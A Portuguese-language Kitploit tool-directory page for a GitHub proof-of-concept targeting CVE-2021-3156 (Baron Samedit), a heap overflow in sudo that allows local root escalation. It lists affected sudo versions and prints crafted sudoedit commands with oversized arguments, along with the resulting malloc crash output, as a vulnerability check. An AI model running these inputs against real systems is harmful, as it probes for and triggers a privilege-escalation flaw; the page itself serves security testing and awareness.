Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Baron-Samedit-Heap-Buffer-Overflow-CVE-2021-3156 — Exploit de prova de conceito para CVE-2021-3156, um estouro de buffer baseado em heap no sudo que permite escalada local de privilégios para root via sudoedit -s com um argumento de linha de comando manipulado. | Kitploit
Ferramentas/GitHubGitHub/shuhaib88/baron-samedit-heap-buffer-overflow-cve-2021-3156
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoRed TeamingExploração de Binários
GitHubshuhaib88/baron-samedit-heap-buffer-overflow-cve-2021-3156

Baron-Samedit-Heap-Buffer-Overflow-CVE-2021-3156

Exploit de prova de conceito para CVE-2021-3156, um estouro de buffer baseado em heap no sudo que permite escalada local de privilégios para root via sudoedit -s com um argumento de linha de comando manipulado.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
11há 1 anoAinda não revisado

Baron-Samedit-Heap-Buffer-Overflow-CVE-2021-3156


Versão Vulnerável ao Exploit

A vulnerabilidade Baron Samedit (CVE-2021-3156) afeta versões legadas do sudo 1.8.2 até 1.8.31p2 e versões estáveis 1.9.0 até 1.9.5p1. Esta falha de estouro de buffer baseado em heap foi introduzida em julho de 2011 através do commit 8255ed69 e permaneceu não detectada por quase uma década.

O sudo anterior à versão 1.9.5p2 contém um erro de off-by-one que pode resultar em um estouro de buffer baseado em heap, o que permite escalonamento de privilégios para root através de "sudoedit -s" e um argumento de linha de comando que termina com um único caractere de barra invertida.

Verificando a vulnerabilidade com comando python

root@kitploit:~
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
root@kitploit:~
malloc(): invalid size (unsorted)
Aborted

Verificando a vulnerabilidade com comando python

root@kitploit:~
sudoedit -s '\' `perl -e 'print "A" x 65536'`
root@kitploit:~
malloc(): corrupted top size
Aborted (core dumped)

Uso e Resultado no Ubuntu 20.04

root@kitploit:~
shuhaib@somebox:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

shuhaib@somebox:~$ sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): invalid size (unsorted)
Aborted (core dumped)

shuhaib@somebox:~$ sudoedit -s '\' `perl -e 'print "A" x 65536'`
malloc(): corrupted top size
Aborted (core dumped)
Baixar ferramenta